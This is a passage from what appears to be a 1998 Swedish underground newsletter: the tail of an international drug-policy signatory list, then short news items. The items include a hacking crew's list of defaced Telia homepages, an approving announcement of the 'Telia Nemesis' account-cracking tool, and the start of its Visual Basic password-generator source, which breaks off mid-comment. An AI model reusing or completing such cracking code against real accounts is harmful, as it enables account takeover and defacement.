 Andreas van Agt
 Former Prime Minister of the Netherlands; Former Minister of Justice;
Former Ambassador of the European Union to the United States

 Janhuib Blans
 Head of Jellinek Prevention; Assistant Professor of Parent Education and
Prevention, University of Amsterdam

 Tim Boekhout van Solinge
 Centre for Drug Research, University of Amsterdam

 Frank Bovenkerk
 Professor of criminology, University of Utrecht

 Giel van Brussel
 MPH Master Public Health, Amsterdam

 Dr. Peter D.A. Cohen
 Centre for Drug Research, University of Amsterdam

 Hedy d'Ancona
 Former Dutch Minister of Welfare, Health, and Culture; Member of the
European Parliament

 Marcel van Dam
 Publicist, Former Minister of Housing and Physical Planning, Putten,
Netherlands

 Dr. Peter A. de Groot
 Psychiatrist, Harderwijk

 Jan F. Glastra van Loon
 Professor, Senator, Former State Secretary of Justice

 John Griffiths
 Professor of Sociology of Law, University of Groningen

 Sylvia van 't Hul
 Public Prosecutor, Rotterdam

 Louk Hulsman
 Emeritus professor of Penal Law and Criminology, Erasmus University,
Rotterdam; Former President, European Commission for Criminal Problems,
Coucil of Europe

 Constantijn Kelk, Ph.D.
 Professor, Director, Willem Pompe Institute for Criminal Sciences, Utrecht
University

 Free le Poole
 Member of the First Chamber of Parliament (Senate), Vice-President,
District Court, Assen

 Ed Leuw
 Researcher at the Ministry of Justice, The Hague

 Freek Polak
 Psychiatrist, Amsterdam

 Felix Rottenberg
 Amsterdam

 Frits C.F. Rüter
 Professor of Criminal Law, University of Amsterdam

 E.H. Schuyer
 Senator; Chairman of Democrats (D66), Senate

 Jan G. van der Tas
 Former Netherlands Ambassador to Germany

 Ed. van Thijn
 Former Mayor of Amsterdam; Professor, University of Amsterdam

 J.M. vander Vaart
 Judge, District Court of Amsterdam

 Leon Wever
 Board Member, Symbion (Addiction Care Rotterdam Region, Rijnmond); Former
Deputy Chief of Addiction Care, Ministry of Health

 Dr. Pieter Winsemius
 Former Netherlands Minister of Housing, Physical Planning and Environment
Policy

NEW ZEALAND

 Tim Barnett
 Member of Parliament, New Zealand

NICARAGUA

 Violeta Barrios de Chamorro
 Former President of Nicaragua

 Miguel d'Escoto Brockman
 Former Foreign Minister; Fundeci Nicaraguan Foundation for Comprehensive
Community Development

 Xabier Gorostiaga
 Former Rector, University of Central America

NORWAY

 Johannes Andenaes
 Professor of Penal Law; Former Rector, University of Oslo; Former
Chairman, Permanent Penal Committee of Norway

 Anders Bratholm
 Professor of Penal Law, University of Oslo

 Nils Christie
 Professor of Criminology, University of Oslo, Former director of
Scandinavian Board of Criminology

 Gunnar Garbo
 Ambassador; Former Member of Parliament

 Ragnar Hauge
 Professor, Former Director, State Institute of Alcohol and Drug Research

 Cecilie Hoigaard
 Professor of Criminology, University of Oslo, Former Director,
Scandinavian Board of Criminology

 Thomas Mathiesen
 Professor of Sociology of Law, University of Oslo

 Sturla Nordlund
 Director, Norwegian State Institute of Alcohol and Drug Research

PERU

 Javier Alva Orlandini
 Member of Congress

 Rolando Ames
 Former Senator

 Humberto Campodonico
 Economist, University Professor (San Marcos)

 Arturo Castillo Chirinos
 Member of Congress

 Julio Cotler
 Director, Institute of Peruvian Studies

 Javier Diez Canseco
 Member of Congress

 Fernando Eguren
 Sociologist, Director of Quarterly Debate Agrario

 Antero Flores Araoz
 Member of Congress

 Lourdes Flores Nano
 Member of Congress

 Ernesto Gamarra Olivares
 Member of Congress

 Diego Garcia-Sayan
 Executive Director, Andean Commission of Jurists

 Alfonso Grados Bertorini
 Member of Congress, Peru

 Gustavo Gutierrez
 Theologian

 Jutta Krause
 German Technical Development Agency

 Manuel Lajo
 Member of Congress

 Guido Lombardi
 Anchor, Red Global TV

 Javier Perez de Cuellar
 Former Secretary General of the United Nations

 Federico Salazar
 Anchor, America TV

 Alejandro Santa Maria
 Member of Congress

 Annel Townsend Diez Canseco
 Member of Congress

 Jose Ugaz
 University Professor

 Allan Wagner
 Former Minister of Foreign Affairs

POLAND

 Marek Balicki
 Psychiatrist, Former Deputy, Ministry of Health

 Mikolaj Kozakiewicz
 Former Speaker of Parliament (1989-1991); Vice-President of IPPFV

 Krzysztof Krajewski
 Professor, School of Criminology, University of Jagiellonski

 Marek Nowicki
 President, Helsinki Foundation for Human Rights; Member, Helsinki Commitee
for Human Rights

 Danuta Przywara
 Secretary to the Board, Helsinki Foundation for Human Rights

 Andrzej Rzeplinski
 Professor of Criminology, University of Warsaw; Deputy President, Helsinki
Foundation for Human Rights

 Janusz Sieroslawski
 Sociologist, Pompidou Group

PORTUGAL

 Daniel Sampaio, MD, Ph.D.
 Professor of Psychiatry, University of Lisbon

SOUTH AFRICA

 Malcolm Damon
 Public Policy Liason Officer, South African Council of Churches

 Neville Gabriel, C.S.S.R.
 SACBC Parliamentary Office

 Helen Suzman
 Former Opposition Member of Parliament, Johannesburg

SPAIN

 Jose Antonio Alonso Suarez
 Judge. Juzgado de lo Penal n° 14 de Madrid

 Gregorio Alvarez Alvarez
 Judge. Juzgado de 1» instancia e instrucción n° 2 de Salamanca

 Francisco Javier Alvarez Garcia
 Law Professor, Universidad de Cantabria

 Perfecto Andrés Ibañez
 Judge; Presidente de la Secc. 15. Audiencia provincial de Madrid

 Heriberto Asencio Castillan
 Judge. Audiencia provincial de Sevilla

 Adela Asua Batarrita
 Law Professor, Universidad de San SebastiØn

 Ignacio Berdugo Goméz De La Torre
 Dean and Law Professor, Universidad de Salamanca

 Emilio Berlanga Ribelles
 Judge. Tribunal Superior de Justicia de Cataluña

 Ricardo Bodas Martin
 Judge. Juzgado de lo Social n° 30 de Madrid

 Javier Boix Reig
 Law Professor - Universidad de Valencia

 Antonio Caballero
 Writer and journalist

 Francisco Candil Jimenez
 Law Professor, Universidad de Sevilla

 Rocio Cantarero Bandres
 Law Professor, Universidad de la Rioja

 Juan Carlos Carbonell Mateu
 Dean and Law Professor, Universidad de Valencia

 Manuela Carmena Castrillo
 Judge. Vocal del Consejo General del Poder judicial

 Miguel Carmona Ruano
 Judge, Presidente de la Audiencia provincial de Sevilla

 Jose Cid Moline
 Law Professor, Universidad Autónoma de Barcelona

 Candido Conde Pumpido
 Judge. Sala 2» del Tribunal Supremo

 Antonio Contardo
 Industrialist

 Antonio Cuerda Riezu
 Law Professor, Universidad de LeónLetrado del Tribunal Constitucional

 Jose Luis De La Cuesta Arzamendi
 Vice Dean and Law Professor Universidad del Pa’s Vasco

 Juan Tomas De Salas
 Lawyer and Journalist- Founder of the Grupo16, Publisher and Editor of
HisToria16, Editor of El Gato Encerrrado

 Jose Luis D’ez Ripollés
 Law Professor, Universidad de MØlagaCoordinador del Grupo de Estudios de
Pol’tica Criminal

 Aurora Elosegui Sotos
 Judge.Juzgado de 1» Instancia n° 6 de San SebastiØn

 Antonio Escohotado
 Writer Professor of the Universidad a Distancia, Author of the best seller
"Historia de las Drogas"

 Jesus Fernandez Entralgo
 Judge. Secc. 17. Audiencia provincial de Madrid

 Maria Dolores Fernandez Rodriguez
 Law Professor, Universidad de Murcia

 Juan Carlos Ferre Olivé
 Law Professor, Universidad de Huelva

 Rafael Fluiters Casado
 Judge. Juzgado de 1» instancia e instrucción n° 1 de AlcalØ de Henares.
Madrid

 Virginia Garcia Alarcon
 Judge. Juzgado de lo Social n° 22 de Madrid

 Mercedes Garc’a Arán
 Law Professor, Universidad Autónoma de Barcelona.Coordinadora del Grupo de
Estudios de Pol’tica Criminal

 Antonio Gil Merino
 Judge, Presidente de la Secc. 7. Audiencia provincial de Sevilla

 Luis Gonzalez Guitián
 Law Professor, Universidad de Santiago de Compostela

 Luis Gracia Martin
 Law Professor, Universidad de Zaragoza

 Gumersindo Guinarte Cabada
 Law Professor, Universidad de Santiago de Compostela

 Hernan Hormazabal Malaree
 Law Professor, Universidad de Gerona

 Maria F Ibañez Solaz
 Judge. Juzgado de Instrucción n° 16 de Valencia

 Carmen Lamarca Perez
 Law Professor, Universidad Carlos III

 Gerardo Landrove Diaz
 Law Professor, Universidad de Murcia

 Elena Larrauri Pijoan
 Law Professor, Universidad Autónoma de Barcelona

 Patricia Laurenzo Copello
 Law Professor, Universidad de MØlaga

 Jose Manuel Lorenzo Salgado
 Law Professor, Universidad de Santiago de Compostela

 Borja Mapelli Caffarena
 Law Professor, Universidad de Sevilla

 Maria Luisa Maqueda Abreu
 Law Professor, Universidad de Almer’a

 Antonio Martin Pallin
 Judge. Sala 2» del Tribunal Supremo

 Javier Martinez Lazaro
 Judge. Juzgado de lo Penal n° 4 de Madrid

 Fermin Morales Prats
 Law Professor, Universidad Autónoma de Barcelona

 Manuel Moran Gonzalez
 Judge. Audiencia Provincial de Salamanca

 Julian Manuel Moreno Retamino
 Judge. Tribunal Superior de Justicia, Sala Cont.-Adm. de Sevilla

 Claudio Movilla Alvarez
 Judge. Sala de lo Contencioso del Tribunal Supremo

 Francisco Muñoz Conde
 Law Professor, Universidad de Sevilla

 Enrique Orts Berenguer
 Law Professor, Universidad de Valencia

 Felix Pantoja
 Judge, Fiscal de Menores de Madrid

 Jose Miguel De Paul Velasco
 Judge. Audiencia Provincial de Sevilla

 Jose Joaquin Perez-Beneyto Abad
 Judge.Juzgado de lo Social n° 4 de Sevilla

 Mario Pestana Perez
 Judge. Juzgado de 1» Ins. e Instrucción n° 1 de Leganés.
Madrid.Coordinador del Grupo de Estudios de Pol’tica Criminal

 Miguel Polaino Navarrete
 Law Professor, Universidad de Sevilla

 Luis Rodriguez Ramos
 Catedrático de Derecho Penal de la Universidad Complutense de Madrid

 Horacio RoldØn Barbero
 Law Professor, Universidad de Córdoba

 Juan Jose Romeo Laguna
 Judge. Audiencia provincial, Sección VIII de Sevilla

 Bernardo Del Rosal Blasco
 Law Professor, Universidad de Alicante

 Ramon Saez Valcarcel
 Judge. Vocal del Consejo General del Poder judicial

 Fernando Savater
 Writer / Philosopher

 Jose R. Serrano-Piedecasas
 Law Professor, Universidad de Salamanca

 Ascension Sole Puig
 Judge.Juzgado de lo Social n° 28 de Barcelona

 Josep Maria Tamarit Sumalla
 Law Professor, Universidad de Lérida

 Juan Terradillos Basoco
 Law Professor, Universidad de CØdiz

 Jose Manuel Valle Muñiz
 Law Professor, Universidad de Lérida

 Ramiro Ventura Faci
 Judge.Juzgado de Instrucción n° 18 de Madrid

 Luis Yañez-Barnuevo
 Member of Parliament

 Jose Miguel Zugaldia Espinar
 Dean, and Law Professor, Universidad de Granada

SWEDEN

 Anders Bergmark
 Professor of social work, Stockholm University

 Peter Curman
 Former Chairman, Swedish Writer's Union

 Ted Goldberg
 Associate Professor of social work, Stockholm University

 Olof Lagercrantz
 Former Editor-In-Chief, Dagens Nyheter

 Leif Lenke
 Associate Professor of criminology, Stockholm University

 Claes Örtendahl
 Former Director General, Board of Health and Welfare, Sweden

 Ingegmar Rexed
 Judge,Svea Court of Appeal, Stockholm

 Jerzy Sarnecki
 Professor of criminology, Stockholm University

 Sune Sunesson
 Professor of social work, Lund University

 Henrik Tham
 Professor of criminology, Stockholm University

 Per Ole Träskman
 Professor of penal law, Lund University, Sweden

 Hanns von Hofer
 Professor of criminology, Stockholm University

SWITZERLAND

 Peter Albrecht
 Judge, Court of Bâle-Ville; Professor, University of Bâle

 Pascal Bernheim
 Second Manager, Radio Suisse Romande - La Première

 Dr. Barbara Broers
 Division of Substance Abuse, Department of Psychiatry, University Hospital
of Geneva

 Christian Brunier
 Member of Parliament, Geneva; President, Geneva Socialist Party

 Pierre Philippe Cadert
 Journalist, Radio Suisse Romande

 Maria Luisa Cesoni
 Attorney, Research Fellow, Faculty of Law, University of Geneva

 Jacqueline Cogne
 Member of Parliament, Geneva

 Herve Dessimoz
 Congressman, Geneva Parliament

 Dr Dominique Hausser, MD, MSc
 Member of Parliament, Geneva; Co-president, Drug Policy Commission,
Socialist Party

 Bohdan D. Hawrylyshyn
 Chairman, International Renaissance Foundation

 Michel Heiniger
 Film Director; Reporter, Swiss TV - Geneva

 Dr. Annie Mino
 MD Head, Division of Substance, Department of Psychiatry, University
Hospital, Geneva

 Christian Nils Robert
 Professor, School of Law, Geneva; CPT Expert (Council of Europe)

 Albert Rodrik
 Member of Parliament, Geneva

 Francoise Schenk-Gottret
 Member of Parliament, Geneva

UNITED STATES

 Morton Abramowitz
 International Crisis Group

 Bruce Ackerman
 Sterling Professor of Law, Yale University

 Tammy Baldwin
 Wisconsin State Representative, Candidate for Congress

 Randy E. Barnett
 Austin B.Fletcher Professor, Boston University School of Law

 Jeremiah A Barondess MD
 President, New York Academy of Medicine

 Jim Baumohl
 Bryn Mawr College

 David H. Bayley
 Dean, School of Criminal Justice State University of New York at Albany

 Peter Beilenson
 Baltimore City Health Commissioner

 Ivan T. Berend
 Professor, University of California, Los Angeles

 Robert L. Bernstein
 Founding Chair, Human Rights Watch

 Jagdish Bhagwati
 Professor of Economics, Columbia University

 Nicolaus Bloembergen
 Nobel Laureate (Physics 1981)

 Leon Botstein
 President, Bard College

 John Bound
 Professor of Economics, University of Michigan

 Willie Brown
 Mayor of San Francisco

 Richard Burt
 Senior Advisor, Center for Strategic and International Studies, Washington DC

 Calvin Butts III
 Pastor, Abyssinian Baptist Church, New York, NY

 Geoffrey Canada
 Rheedlen Center for Children & Families, Inc.

 William J Chambliss
 Professor, George Washington University

 Allan Clear
 Executive Director, Harm Reduction Coalition

 Harvey Cox
 Professor of Divinity, Harvard University

 Alan Cranston
 Former U.S. Senator

 Walter Cronkite
 Author, Broadcast Journalist

 John Curtin
 Federal Judge, Buffalo, NY

 Lloyd N. Cutler
 Lawyer, Wilmer, Cutler & Pickering; Former Counsel to the President,
1979-1981, 1994

 Richard Dennis
 President, Dennis Trading Group

 Adrian W. DeWind
 Partner, Paul, Weiss, Rifkind, Wharton and Garrison

 Jameson Doig
 Professor of Politics and Public Affairs, Princeton University

 Vincent Dole, MD
 Professor Emeritus, Rockefeller University

 Elizabeth K. Dollard
 Professor of Law, Medicine & Psychiatry at NYU Law School

 Ann Druyan
 Federation of American Scientists

 Steven Duke
 Professor, Yale Law School

 Troy Duster
 Professor of Sociology, University of California, Berkeley

 Jonathan Eaton
 Chairman, Department of Economics, Boston University

 Thomas Eissenberg, Ph.D.
 Assistant Professor, Virginia Commonwealth University

 Joycelyn Elders
 Former U.S. Surgeon General

 Ahmet Ertegun
 Executive Chairman, Atlantic Records

 Jonathan F. Fanton
 President, New School University

 John Ferejohn
 Professor of Political Science, Stanford, Senior Fellow Hoover
Institution, Stanford University

 Herman Feshbach
 Institute Professor Emeritus, MIT

 Robert Field
 Chairman, Common Sense for Drug Policy

 Hamilton Fish
 President, Public Concern Foundation

 Val L. Fitch
 Professor Emeritus of Physics, Princeton University

 Rev. Floyd Flake
 Cathedral of the Allen AME Church, Pastor

 Kathleen M. Foley
 Project on Death in America

 Milton Friedman
 Senior Research Fellow, Hoover Insitution, Stanford University

 Douglas Gale
 Professor of Economics, New York University

 H. Jack Geiger, MD
 Professor of Community Medicine, City University of New York Medical School

 Adrienne Germain
 President, International Women's Health Coalition

 Alfred G. Gilman, MD, PhD
 Regental Professor and Chairman, Department of Pharmacology, University of
Texas

 Ira Glasser
 Executive Director, The American Civil Liberties Union

 Ellen Goldberg
 President, Santa Fe Institute

 Marvin L. Goldberger
 Dean, Division of Natural Sciences, University of California, San Diego

 Stephen Jay Gould
 Harvard University

 Mike Gray
 Author, "Drug Crazy"

 Paul Greengard
 Vincent Astor Professor of Neuroscience, Chief of the Laboratory of
Molecular and Cellular Neuroscience, Rockefeller University

 Lester Grinspoon
 Harvard Medical School

 Lani Guinier
 Professor of Law, University of Pennsylvania

 Terrence Hallinan
 District Attorney of San Francisco

 Morton H. Halperin
 Former Department of Defense and National Security Council Official

 Susan Hammer
 Mayor of San Jose

 Vernon Henderson
 Professor of Economics, Brown University

 Arnold Hiatt
 Stride Rite Foundation

 H.J. Hoffer, PhD
 Dean Emeritus, Katz Graduate School of Business, University of Pittsburgh

 Sher Horosko
 Executive Director, Drug Policy Foundation

 Douglas Husak
 Professor of Philosophy, Rutgers University

 Alex Inkeles
 Sociologist, Senior Fellow Emeritus Hoover Institution, Stanford University

 Sut Jhally
 Professor of Communication, University of Massachusetts - Amherst

 Carole Joffe
 Professor of Sociology at University of California

 Howard Josepher, CSW
 Executive Director, Exponents Inc.

 John Kane
 Federal Judge, Denver, CO

 Nicholas Katzenbach
 Former Attorney General

 Donald Kennedy
 President Emeritus Stanford University; Professor Bological Services,
Stanford

 Rufus King, Sr.

 Daniel Klein
 Department of Economics, Santa Clara University

 Whitman Knapp
 Senior District Judge, Southern District of New York

 Jeanne E. Kohl
 Senator, Washington State

 Melvyn Krauss
 Economist, Senior Fellow Hoover Institution, Stanford University

 Mike Lawlor
 Chair Judiciary Committee, Connecticut House of Representatives

 Joshua Lederberg
 Professor, Rockefeller University

 Phillip R. Lee
 Professor Emeritus, School of Medicine, University of California, San
Francisco

 David Lenson
 Professor of Comparative Literature, University of Massachusetts, Amherst

 Titus Levi
 Assistant Professor, University of Southern California

 Robin J. Lewis
 Associate Dean, School of International Affairs, Columbia University

 Peter Lewis
 Chairman, CEO, The Progressive Corporation

 Walter Loewenstern, Jr., PhD
 Co-Founder ROLM Corporation, Overseer Hoover Institution, Stanford
University, President Vail Valley Institute

 Robert E. Lucas, Jr.
 Department of Economics, University of Chicago

 Peter Lurie
 University of Michigan

 Paul Martin L.
 Nobel Laureate (Physics)

 Gary T. Marx
 Professor Emeritus, M.I.T.; Professor of Sociology, University of Colorado

 Joseph McNamara
 Former Police Chief of Kansas City and San Jose, Research Fellow Hoover
Institution

 Donal E. J. McNamara
 Former President American Society of Criminology

 Miguel Mendez
 Professor of Law, Stanford University

 Matthew Meselson
 Harvard University

 Ruth Messenger
 Former Manhattan Borough President

 Robert B. Millman
 Soul P. Steinberg Distinguished Professor of Psychiatry and Public Health,
Cornell University Medical College

 Jeff Miron
 Professor of Economics, Boston University

 Toby Moffett
 Former U.S. Congressman; Vice President, Monsanto Company, Washington, DC

 Howard Moody
 Reverend Emeritus, Judson Memorial Church, New York, NY

 Thomas Moore
 Economist, Senior Fellow, Hoover Institution, Stanford University

 Paul Moore, Jr.
 Bishop (Retired), Episcopal Church of New York

 Dr. John P. Morgan
 Professor of Pharmacology, City University of New York Medical School

 Andrew P. Morriss
 Associate Professor of Law & Associate Professor of Economics, Case
Western Reserve University, Cleveland, Ohio

 Patrick Murphy
 Former Police Commissioner of New York City

 Charles Murray
 American Enterprise Institute

 Ethan Nadelmann, PhD
 Director, The Lindesmith Center

 Robert Newman
 Continuum Health Partners

 Roger Noll
 Professor of Economics, Director of Public Policy Program, Stanford
University

 Richard L. Ottinger
 Former Congressman

 Denise Paone, PhD
 Assistant Director of Research, Asisstant Professor, Beth Israel Medical
Center

 Claiborne Pell
 Former U.S. Senator

 Joan Petersilia
 Professor of Criminology, University of California, Irvine

 Gerard Piel
 Former Editor/Publisher, Scientific American

 Senator Anne Rand
 Assistant Majority Leader, Maine Senate

 David Rasmussen
 Professor of Economics, Florida State University

 William Ratliff
 Political Scientist, Senior Research Fellow Hoover Institution, Stanford
University

 Craig Reinarman
 Professor of Sociology, Univeristy of California, Santa Cruz

 Timothy N. Robertson
 Legislator, New Hampshire

 Dean E. Robinson
 Assistant Professor, University of Massachusetts - Amherst

 G. Alan Robison
 Distinguished Professor of Pharmacology, University of Texas, Houston

 Laurance Rockefeller

 Ruth Rosen
 Professor of History at the U. of California, Davis

 Marsha Rosenbaum
 Director The Lindesmith Center, San Francisco office

 Allan Rosenfield
 Dean, Columbia School of Public Health

 Vernon W. Ruttan
 Regents Professor, University of Minnesota

 Oscar Schachter
 Professor Emeritus of International Law and Diplomacy, Columbia University

 Kurt Schmoke
 Mayor of Baltimore

 Sidney H. Schnoll, M.D., Ph.D.
 Division of Substance Abuse Medicine, Medical College of Virginia

 Carl E. Schorske
 Professor of History, Princeton University

 Herman Schwartz
 Professor of Law, American University

 George Shultz
 Former Secretary of State, Dinstinguished Fellow, Hoover Institution

 Henry Siegman
 Senior Fellow, Council on Foreign Relations, New York

 Richard E. Smalley
 Nobel Laureate (Chemistry, 1996)

 George Soros
 Chairman, Soros Fund Management LCC; Chairman, Open Society Institute

 John Sperling
 Chairman and CEO, Apollo Group, Inc.

 Eric Sterling
 President, Criminal Justice Policy Foundation, Washington, D.C.

 Robert S. Strauss
 Akin, Gump, Strauss, Hauer & Feld

 Eve Sullivan
 Founder, Parents' Forum

 Leon H. Sullivan
 Chairman, OIC of America

 Robert Sweet
 Federal Judge, New York, NY

 Hon. James W. Symington
 Attorney at Law

 David J. Theroux
 Founder/President, The Independent Institute

 Brooks Thomas
 Former Chairman and CEO Harper and Row, Publishers, Inc.

 John S. Toll
 Chancellor Emeritus, University of Maryland System; President, Washington
College; Former President, Washington Academy of Sciences; Former
President, Universities Research Association

 Arnold S. Trebach, J.D. , Ph.D.
 Professor Emeritus, American University; Founder, The Drug Policy Foundation

 Donald Trunkey
 MD, Chairman and Professor, Department of Surgery, Oregon Health Sciences
University

 Richard Ullman
 Professor , Woodrow Wilson School, Princeton Universtiy

 J. Thomas Ungerleider, MD
 Professor Emeritus of Psychiatry, University of California, Los Angeles,
Medical Center; Presidential Appointee (Nixon), National Commission on
Marijuana and Drug Abuse

 Dr. Mark Vierra
 Assistant Professor of Surgery, Stanford University

 James Vorenberg
 Professor, Harvard Law School

 Faye Wattleton
 Former Executive Director, Planned Parenthood

 Andrew Weil
 Clinical Professor of Internal Medicine, University of Arizona College of
Medicine; Author of "Spontaneous Healing" and "Natural Health, Natural
Healing"

 Andrew Weiss
 Professor of Economics, Boston University

 Jann S. Wenner
 Chairman, Wenner Media, Inc.

 Cornel West
 Professor, Harvard University

 Sidney M. Wolfe, MD
 Public Citizen's Health Research Group

 Gavin Wright
 Professor of Economics, Stanford University

 Kevin B. Zeese
 President, Common Sense for Drug Policy

 George Zimmer
 Chairman/CEO, Men's Wearhouse

 Lynn Zimmer
 Associate Professor of Sociology, Queens College, City University of New York

 Franklin Zimring
 Professor of Law, UC Berkeley

 Jeffrey Zwiebel
 Associate Professor of Finance, Graduate School of Business, Stanford
University

UNITED KINGDOM

 Lord Rae
 House of Lords

 Austin N.E. Amissah
 Judge, London

 Rabbi Tony Bayfield
 Director, Sternberg Centre for Judaism

 Colin Blakemore
 Professor; Fellow of the Royal Society; President, British Association for
the Advancement of Science

 Colin Brewer
 Medical Director, the Stapleford Centre

 Rabbi Sidney Brichto
 Senior Vice President of the Union of Liberal and Progressive Synagogues

 Peter P. Burnett
 Bodleian Library

 Alison Downie
 Chair of Release, Solicitor

 Edward Ellison
 Retired Detective Chief Superintendent Metropolitan Police, Operational
Head of Scotland Yard Drug Squad

 Stephen Fineman
 Professor, University of Bath

 Paul Flynn
 Member of Parliament, House of Commons

 Mike Goodman
 Director Release

 Dr. Brian Iddon
 Member of Parliament, London

 Mike Jay
 Chairman, Drug Policy Review Group

 Nicholas Kurti
 Fellow of the Royal Society

 Danny Kushlick
 Director, Transform

 Reverend Dr. Kenneth Leech
 Founder of Soho Drugs Group, Founder of Centrepoint

 Robin Marris
 Professor Emeritus, London University

 Judi Marshall
 Professor, Bath University

 Austin Mitchell
 Member of Parliament, UK

 Edith Morgan
 Mental Health Consultant, Order of the British Empire

 Dr. Richard Newman
 Professor of History, University of Wales Swansea

 John Purcell
 Professor, School of Human Resource Management, University of Bath

 Lord Rae, MD
 House of Lords

 Anita Roddick, OBE
 Founder, The Body Shop

 Martin Short
 Author

 Nigel South
 Professor of Sociology, University of Essex

 Ian Sparks
 Chief Executive, The Children's Society

 Eleanor Stephens
 Senior Lecturer, Media Journalism, University of Sheffield

 Richard Stevenson
 Professor of Health Economy, Liverpool University

 Anthony Tibber
 Judge, London

 Carole Tongue
 Member of European Parliament

 Right Reverend Rowan Williams
 Bishop of Monmouth

URUGUAY

 Mario Benedetti
 Writer

VENEZUELA

 Simon Alberto Consalvi
 Former Minister of Foreign Affairs

 Diego Arria
 Ambassador; Former Representative of Venezuela to the United Nations and
Security Council

__________________________________________________________________________


5, DROGTESTER ALLT VANLIGARE PÅ ARBETSPLATSER
==========================

Antalet drogtester på arbetsplatser ökar stadigt. LabMedicin vid
Huddinge sjukhus, som utför cirka 80 procent av landets tester, gjorde
förra året 40 000 analyser, en fördubbling jämfört med året
före. Så sent som 1992 utfördes bara 100 analyser vid Huddinge Sjukhus.
I dag drogtestar vart tredje större företag sin personal. Det sker främst
vid nyanställning, men också vid misstanke.

[Källa: Metro]

__________________________________________________________________________

 > > > H A C K I N G / C O M P U T E R U N D E R G R O U N D / I T < < <
__________________________________________________________________________


6. THE EVIL FELIA FUCKERS INC PRESENTERAR: VECKANS HACKADE TELIA SIDOR
==========================

'Tha Evil Felia Fuckers iNC' proudly present: 'Veckans hackade Telia sidor'

http://w1.510.telia.com/~u51000380/
http://w1.520.telia.com/~u52002969/
http://w1.520.telia.com/~u52003006/
http://w1.361.telia.com/~u36103056/
http://w1.361.telia.com/~u36102809/
http://w1.361.telia.com/~u36103325/
http://w1.851.telia.com/~u85102752/
http://w1.851.telia.com/~u85100036/
http://w1.866.telia.com/~u86602009/
http://w1.191.telia.com/~u19102038/

tEFF Crew

__________________________________________________________________________


7. PORRBILD PÅ KUNGEN SOM NAKEN KVINNA UPPRÖR KTH
==========================

Två manliga studenter vid Kungliga Tekniska Högskolan har utestängts från
lokalerna och all undervisning i tre månader.
 Orsaken: en sångtext om ett samlag mellan kungen och drottningen
och en bild på kungen som naken kvinna. Texten och bilden hade
studenterna lagt ut på Internet. KTH:s disciplinnämnd ansåg att
eleverna spridit pornografiskt material som allvarligt kränker
kungen och drottningen.
 Nämden ansåg att också KTH:s anseende äventyrats genom det som
inträffat."

[Källa: GP, 5/6-98]

__________________________________________________________________________


8. INTERNET DOM I TYSKLAND FÅR KRITIK
==========================

Torsdagen den 28 maj blev förra Compuserve-chefen i Tyskland, Felix Somm
dömd till två års villkorligt fängelsestraff.
Grund: Medhjälp till spridning av barn- och djur-pornografi.
FDP-Generalsekreterare (Freie Deutsche Partei, tyska liberala partiet)
Guido Westerwelle har fodrat en korrektur på domen genom den nästa juristiska
instansen.
Westerwelle: "Här blev inte gärningsmännen straffade!". Somm har inte gjort
något annat än att förmedla datorägare tillgången till Internet. Om domen
kvarstår kommer Tyskland att internationellt isolera sig och ISPs kommer
att gå Tyskland ur vägen. Även ISP's som T-Online, Compuserve, AOL och
germany.net kritiserade domen.

[Källa: "die Blöd-Zeitung" 2 juni '98 | Översättning: Aron Håkanson]

__________________________________________________________________________


9. HACKERS STAL DATA OM BOMBER
==========================

En grupp hackers hävdar att de brutit sig in i indiska datorsystem vid
Bhabha Atomic Research Centre i Bombay. Där ska de bland annat ha
kopierat e-post mellan indiska forskare veckorna före och efter
bombsprängningarna.
De hävdar att de försöker knäcka forskningsdatorer i Pakistan nu.

[Källa: Wired]

__________________________________________________________________________


10. TELIA NEMESIS V.1.4 SLÄPPS 20 JUNI
==========================

Telia Nemesis (Hämnd) är ett Windows 95-program som enkelt och snabbt
knäcker Telia 020 konton (1997, U-konton) via FTP. Programmet ligger nu
på version 1.3 och har hittils knäckt hundratals konton. Programmet är
gratis och finns att ladda ner på adressen http://netking.ml.org/nemesis.
Programmet är utvecklat av en 16 årig pojkspoling som kommenterar om
Telias bristande säkerhet påföljande sätt: "Det är pinsamt att en
16-åring ska kunna göra ett program under en veckas tid som snabbt och
enkelt knäcker koder till Telia konton. I runt en månad har programmet
varit tillgängligt, och när Telia till slut bestämde sig för att göra
något åt saken så var deras FTP nere i hela två veckor för 'service'.
Under denna tiden kunde ingen Telia 020 abonnent t.ex ändra sina
hemsidor etc. Jag undrar vad dom kör för servrar... NT på Intel burkar?
Ha ha ha!" Just innan version 1.4 skulle släppas så fixade Telia detta
pinsamma problem. Telia Nemesis 1.4 kommer dock att släppas 20:e Juni
(istället för 10:e) och kommer då att gå till väga på ett annat sätt när
det knäcker konton.

Kolla på: http://netking.ml.org/nemesis för uppdateringar etc.

OBS! De tidigare versionerna funkar alltså inte längre eftersom dom alla
gick via FTP.

Anonym @ #020.se

__________________________________________________________________________


11. KÄLLKODEN (VISUAL BASIC) FÖR TELIA NEMESIS
==========================

Källkoden (Visual Basic) för password-generatorn bifogas här också.

'Telia Nemesis
'-------------------------------------
'Sourcecoden för att generera lösenord i Visual Basic från Telia Nemesis!
'Denna kod borde funka i version 3.0 av VB och uppåt (bara testad i 4.0 och
5.0)
'-------------------------------------
'Använd koden i era program för att generera de cirka 4500 lösenord som
existerar i Telias
'gamla konton.
'Var god läs i flashback #97 om hur Telias lösenord fungerar så blir denna kod
'mycket enklare att förstå.
'Det enda ni behöver göra är att paste:a in hela koden i ert "codewindow"
'Det ni behöver till "projektet" (nu snackar vi VB ;) är:
'
'1. En form, som ska heta Form1
'2. En Timer som ska heta Timer1
'
'Ni kanske redan lagt märke till att det inte behövs några x-tra kontroller
eller DLL-filer för exemplet.
'
'Whatever, nu börjar vi!
'Här deklareras de nödvändiga variablerna:

Dim a, b, c, d, e, f, g, h, ax, bx, cx, dx, ex, fx, gx, hx, pass

'När programmet laddas set den till att de första lösenorden börjar med ett
"y", självklart kan ni ändra dessa. Men då måste ni också ändra vilket
tecken den ska sluta på i koden också.
Private Sub Form_Load()
Timer1.Interval = 1
ax = "y"
X = "y"

End Sub

'Timer som genererar lösenorden
'Jag ska försöka förklara hur generatorn fungerar
'OBS! Läs nr #97 av Flashback för att få en uppfattning om hur lösenorden är
'uppbyggda annars kommer ni nog inte förstå ett dugg av denna röra :)
'
'Det första tecknet av lösenordet har alltså 28 olika möjligheter och
'efter varje tecken finns det alltså 2 efterföljare. En varibel avgör vilken...
'
'Exempel:
'Vi säger att det första tecknet är ett "y" då måste det andra alltså vara "6"
'eller "X" (kolla tabellerna codes1: och codes2: nedan). Variabeln ax står för
